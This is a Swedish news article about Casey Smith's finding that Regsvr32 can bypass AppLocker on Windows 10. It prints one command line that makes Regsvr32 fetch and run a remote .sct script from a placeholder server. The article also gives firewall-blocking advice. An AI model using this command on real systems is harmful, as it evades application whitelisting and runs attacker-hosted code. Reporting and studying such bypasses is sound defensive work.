En forskare från Colorado som går under namnet, Casey Smith, har funnit att Regsvr32 kan användas för att kringgå AppLocker på Windows 10, och detta är ett stort problem för datoranvändare, särskilt de i affärsmiljön.

AppLocker introducerades först i Windows 7 och Windows Server 2008 R2. Det är utformat för att tillåta administratörer att specificera vilken grupp eller användare som kan dra fördel av vissa eller alla applikationer baserat på filernas unika identitet. Om du är en person som tenderar att använda AppLocker, bör det vara allmänt känt att det kan användas för att skapa vissa regler för att tillåta program att köra eller stoppa dem i sina spår.

För de som kanske inte är medvetna kan Regvr32 användas för att registrera och avregistrera DLL-filer. Det här är inte ett verktyg med ett klick eftersom det är ett kommandoradsverktyg, så bara avancerade datoranvändare bör försöka dra nytta av vad det har att erbjuda.

Vi förstår att genom att använda denna teknik förändrar det inte datorsystemets register, vilket gör det svårt för administratörer att veta om några ändringar har gjorts.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

”Det fantastiska här är att regsvr32 redan är proxymedveten, använder TLS, följer omdirigeringar etc.… Och… Du gissade en signerad, standard MS-binär. Så allt du behöver göra är att vara värd för din.sct-fil på en plats du kontrollerar, ”skrev Smith.

Ovanstående teknik kräver inte administrativa behörigheter och den ändrar inte registret. Dessutom kan skripten kallas över både HTTP eller HTTPS. Just nu har Microsoft inte släppt en korrigeringsfil för detta lilla problem, så det enda alternativet vid denna tidpunkt är att blockera Regsvr32 via Windows Firewall.

Intressant nog har mjukvarugiganten ännu inte svarat på den säkerhetsproblem som operativsystemet står inför. Nu när det är ute i det fria förväntar vi oss att höra något från företaget tillsammans med samtal om en framtida korrigering.